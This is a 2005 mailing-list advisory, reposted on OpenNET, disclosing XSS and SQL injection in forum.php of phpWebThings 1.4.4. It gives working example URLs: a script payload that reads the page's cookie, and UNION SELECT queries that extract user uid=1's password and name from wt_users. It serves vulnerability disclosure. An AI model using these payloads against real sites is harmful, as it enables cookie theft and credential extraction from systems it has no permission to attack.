OpenNET security: XSS & SQL injection in phpWebThing

XSS & SQL injection in phpWebThing


<< Previous	INDEX	Search	src	Set bookmark	Go to bookmark	Next >>

Date: 5 Nov 2005 03:00:11 -0000
From: [email protected]
To: [email protected]
Subject: XSS & SQL injection in phpWebThing
X-Virus-Scanned: antivirus-gw at tyumen.ru

Vulnerable: phpWebThings 1.4.4
http://phpwebthings.org

The bug reside in : forum.php 

Exploit :

http://xxx.com/forum.php?forum=[XSS]
http://xxx.com/forum.php?forum=[SQL]

Example :

XSS

http://xxx.com/forum.php?forum='><script>alert(document.cookie)</script>

SQL

For Passowrd

http://xxx.com/forum.php?forum=-1 union select password,password,null,null,null,null from wt_users where uid=1/*

For Name

http://xxx.com/forum.php?forum=-1 union select name,name,null,null,null,null from wt_users where uid=1/*



Discovery by Linux_Drox

http://www.lezr.com

Best Regards


<< Previous	INDEX	Search	src	Set bookmark	Go to bookmark	Next >>

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру